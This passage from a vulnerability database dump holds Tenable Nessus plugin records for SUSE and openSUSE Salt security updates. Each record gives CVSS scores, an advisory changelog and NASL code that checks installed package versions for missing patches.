Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-21T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : Salt (SUSE-SU-2020:1973-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18897", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-api", "p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-proxy", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-syndic", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1973-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138794", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1973-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138794);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-18897\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SUSE SLES15 Security Update : Salt (SUSE-SU-2020:1973-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update fixes the following issues :\n\nsalt :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nVarious virt backports from 3000.2\n\nAvoid traceback on debug logging for swarm module (bsc#1172075)\n\nAdd publish_batch to ClearFuncs exposed methods\n\nUpdate to salt version 3000 See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nTestsuite fix\n\nAdd option to enable/disable force refresh for zypper\n\nPython3.8 compatibility changes\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions\nbecause of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions (bsc#1169604)\n\nRevert broken changes to slspath made on Salt 3000\n(saltstack/salt#56341) (bsc#1170104)\n\nReturns a the list of IPs filtered by the optional network list\n\nFix CVE-2020-11651 and CVE-2020-11652 
(bsc#1170595)\n\nDo not require vendored backports-abc (bsc#1170288)\n\nFix partition.mkpart to work without fstype (bsc#1169800)\n\nEnable building and installation for Fedora\n\nDisable python2 build on Tumbleweed We are removing the python2\ninterpreter from openSUSE (SLE16). As such disable salt building for\npython2 there.\n\nMore robust remote port detection\n\nSanitize grains loaded from roster_grains.json cache during\n'state.pkg'\n\nDo not make file.recurse state to fail when msgpack 0.5.4\n(bsc#1167437)\n\nBuild: Buildequire pkgconfig(systemd) instead of systemd\npkgconfig(systemd) is provided by systemd, so this is de-facto no\nchange. But inside the Open Build Service (OBS), the same symbol is\nalso provided by systemd-mini, which exists to shorten build-chains by\nonly enabling what other packages need to successfully build\n\nAdd new custom SUSE capability for saltutil state module\n\nFixes status attribute issue in aptpkg test\n\nMake setup.py script not to require setuptools greater than 9.1\n\nLoop: fix variable names for until_no_eval\n\nDrop conflictive module.run state patch (bsc#1167437)\n\nUpdate patches after rebase with upstream v3000 tag (bsc#1167437)\n\nFix some requirements issues depending on Python3 versions\n\nRemoves obsolete patch\n\nFix for low rpm_lowpkg unit test\n\nAdd python-singledispatch as dependency for python2-salt\n\nVirt._get_domain: don't raise an exception if there is no VM\n\nFix for temp folder definition in loader unit test\n\nAdds test for zypper abbreviation fix\n\nImproved storage pool or network handling\n\nBetter import cache handline\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python\n2\n\nFix regression in service states with reload argument\n\nFix integration test failure for test_mod_del_repo_multiline_values\n\nFix for unless requisite when pip is not installed\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation\n\nFix tornado imports and missing _utils after 
rebasing patches\n\nRemoves unresolved merge conflict in yumpkg module\n\nUse full option name instead of undocumented abbreviation for zypper\n\nRequiring python3-distro only for openSUSE/SLE >= 15 and not for\nPython 2 builds\n\nAvoid possible user escalation upgrading salt-master (bsc#1157465)\n(CVE-2019-18897)\n\nFix unit tests failures in test_batch_async tests\n\nBatch Async: Handle exceptions, properly unregister and close\ninstances after running async batching to avoid CPU starvation of the\nMWorkers (bsc#1162327)\n\nRHEL/CentOS 8 uses platform-python instead of python3\n\nLoader: invalidate the import cachefor extra modules\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nImprovements for chroot module\n\nAdd option to enable/disable force refresh for zypper\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions\nbecause of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions (bsc#1169604)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1157465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1159284\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1162327\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1165572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1167437\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168340\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169800\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170104\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170288\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1171906\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.saltstack.com/en/latest/topics/releases/3000.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-18897/\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201973-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b40e28d\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-1973=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-1973=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1973=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1973=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python2-salt-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python3-salt-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-api-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-cloud-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-doc-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-master-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-minion-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-proxy-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-ssh-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-standalone-formulas-configuration-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-syndic-3000-5.78.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:17:12", "description": "This update for salt contains the following fixes :\n\n - Fix for TypeError in Tornado importer (bsc#1174165)\n\n - Require python3-distro only for TW (bsc#1173072)\n\n - Update 
to Salt version 3000: See release notes:\n https://docs.saltstack.com/en/latest/topics/releases/300 0.html\n\n - Add docker.logout to docker execution module.\n (bsc#1165572)\n\n - Add option to enable/disable force refresh for zypper.\n\n - Add publish_batch to ClearFuncs exposed methods.\n\n - Adds test for zypper abbreviation fix.\n\n - Avoid segfault from 'salt-api' under certain conditions of heavy load managing SSH minions. (bsc#1169604)\n\n - Avoid traceback on debug logging for swarm module.\n (bsc#1172075)\n\n - Batch mode now also correctly provides return value.\n (bsc#1168340)\n\n - Better import cache handline.\n\n - Do not make file.recurse state to fail when msgpack 0.5.4. (bsc#1167437)\n\n - Do not require vendored backports-abc. (bsc#1170288)\n\n - Fix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation.\n\n - Fix for low rpm_lowpkg unit test.\n\n - Fix for temp folder definition in loader unit test.\n\n - Fix for unless requisite when pip is not installed.\n\n - Fix integration test failure for test_mod_del_repo_multiline_values.\n\n - Fix regression in service states with reload argument.\n\n - Fix tornado imports and missing _utils after rebasing patches.\n\n - Fix status attribute issue in aptpkg test.\n\n - Improved storage pool or network handling.\n\n - loop: fix variable names for until_no_eval.\n\n - Make 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python 2.\n\n - Make setup.py script not to require setuptools greater than 9.1.\n\n - More robust remote port detection.\n\n - Prevent sporious 'salt-api' stuck processes when managing SSH minions. because of logging deadlock.\n (bsc#1159284)\n\n - Python3.8 compatibility changes.\n\n - Removes unresolved merge conflict in yumpkg module.\n\n - Returns a the list of IPs filtered by the optional network list.\n\n - Revert broken changes to slspath made on Salt 3000 (saltstack/salt#56341). 
(bsc#1170104)\n\n - Sanitize grains loaded from roster_grains.json cache during 'state.pkg'.\n\n - Various virt backports from 3000.2.\n\n - zypperpkg: filter patterns that start with dot.\n (bsc#1171906)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : salt (openSUSE-2020-1074)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python2-salt", "p-cpe:/a:novell:opensuse:python3-salt", "p-cpe:/a:novell:opensuse:salt", "p-cpe:/a:novell:opensuse:salt-api", "p-cpe:/a:novell:opensuse:salt-bash-completion", "p-cpe:/a:novell:opensuse:salt-cloud", "p-cpe:/a:novell:opensuse:salt-fish-completion", "p-cpe:/a:novell:opensuse:salt-master", "p-cpe:/a:novell:opensuse:salt-minion", "p-cpe:/a:novell:opensuse:salt-proxy", "p-cpe:/a:novell:opensuse:salt-ssh", "p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration", 
"p-cpe:/a:novell:opensuse:salt-syndic", "p-cpe:/a:novell:opensuse:salt-zsh-completion", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-1074.NASL", "href": "https://www.tenable.com/plugins/nessus/139012", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1074.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139012);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-15750\",\n \"CVE-2018-15751\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"openSUSE Security Update : salt (openSUSE-2020-1074)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for salt contains the following fixes :\n\n - Fix for TypeError in Tornado importer (bsc#1174165)\n\n - Require python3-distro only for TW (bsc#1173072)\n\n - Update to Salt version 3000: See release notes:\n https://docs.saltstack.com/en/latest/topics/releases/300\n 0.html\n\n - Add docker.logout to docker execution module.\n (bsc#1165572)\n\n - Add option to enable/disable force refresh for zypper.\n\n - Add publish_batch to ClearFuncs exposed methods.\n\n - Adds test for zypper abbreviation fix.\n\n - Avoid segfault from 'salt-api' under certain conditions\n of heavy load managing SSH minions. 
(bsc#1169604)\n\n - Avoid traceback on debug logging for swarm module.\n (bsc#1172075)\n\n - Batch mode now also correctly provides return value.\n (bsc#1168340)\n\n - Better import cache handline.\n\n - Do not make file.recurse state to fail when msgpack\n 0.5.4. (bsc#1167437)\n\n - Do not require vendored backports-abc. (bsc#1170288)\n\n - Fix errors from unit tests due NO_MOCK and\n NO_MOCK_REASON deprecation.\n\n - Fix for low rpm_lowpkg unit test.\n\n - Fix for temp folder definition in loader unit test.\n\n - Fix for unless requisite when pip is not installed.\n\n - Fix integration test failure for\n test_mod_del_repo_multiline_values.\n\n - Fix regression in service states with reload argument.\n\n - Fix tornado imports and missing _utils after rebasing\n patches.\n\n - Fix status attribute issue in aptpkg test.\n\n - Improved storage pool or network handling.\n\n - loop: fix variable names for until_no_eval.\n\n - Make 'salt.ext.tornado.gen' to use\n 'salt.ext.backports_abc' on Python 2.\n\n - Make setup.py script not to require setuptools greater\n than 9.1.\n\n - More robust remote port detection.\n\n - Prevent sporious 'salt-api' stuck processes when\n managing SSH minions. because of logging deadlock.\n (bsc#1159284)\n\n - Python3.8 compatibility changes.\n\n - Removes unresolved merge conflict in yumpkg module.\n\n - Returns a the list of IPs filtered by the optional\n network list.\n\n - Revert broken changes to slspath made on Salt 3000\n (saltstack/salt#56341). 
(bsc#1170104)\n\n - Sanitize grains loaded from roster_grains.json cache\n during 'state.pkg'.\n\n - Various virt backports from 3000.2.\n\n - zypperpkg: filter patterns that start with dot.\n (bsc#1171906)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1159284\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1165572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1167437\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168340\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170104\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170288\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171906\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1174165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.saltstack.com/en/latest/topics/releases/3000.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected salt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python2-salt-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python3-salt-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-api-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-bash-completion-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-cloud-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", 
